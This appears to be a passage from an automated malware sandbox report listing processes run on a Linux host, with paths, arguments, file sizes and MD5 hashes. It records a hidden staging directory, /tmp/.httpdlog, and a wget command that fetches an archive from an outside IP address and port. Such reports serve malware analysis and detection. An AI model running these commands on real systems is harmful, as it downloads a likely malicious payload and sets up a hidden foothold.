MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/grep |
Arguments: | grep -v grep |
File size: | 211224 bytes |
MD5 hash: | fc9b0a0ff848b35b3716768695bf2427 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/mkdir |
Arguments: | mkdir /tmp/.httpdlog |
File size: | 76848 bytes |
MD5 hash: | a97f666f21c85ec62ea47d022263ef41 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/bin/wget |
Arguments: | wget http://115.236.92.99:54321/mall.tar.gz |
File size: | 474656 bytes |
MD5 hash: | 458ce58ac4b1aac3eafc287fa46bf92d |